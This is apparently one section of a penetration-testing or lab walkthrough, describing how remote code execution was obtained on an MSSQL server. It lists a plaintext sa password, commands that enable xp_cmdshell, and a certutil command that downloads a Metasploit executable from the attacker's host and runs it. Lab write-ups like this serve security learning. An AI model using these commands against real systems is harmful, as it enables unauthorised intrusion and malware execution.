Exploitation

After getting the credentials for the MSSQL Server I got remote code execution.

Creds: sa:EjectFrailtyThorn425

sqsh -S victim-ip -U sa -P password

exec sp_configure 'xp_cmdshell', 1
go
EXEC SP_CONFIGURE 'xp_cmdshell', 1 
reconfigure 
go
xp_cmdshell whoami
go





output 


weoweo\wewo

Then did something along the lines

xp_cmdshell "certutil -urlcache -f http://myip:myport/msf.exe msf.exe" "
go
then
xp_cmdshell 'cmd /c msf.exe'
go

PreviousSMB NextPriv Escalation

Last updated 3 years ago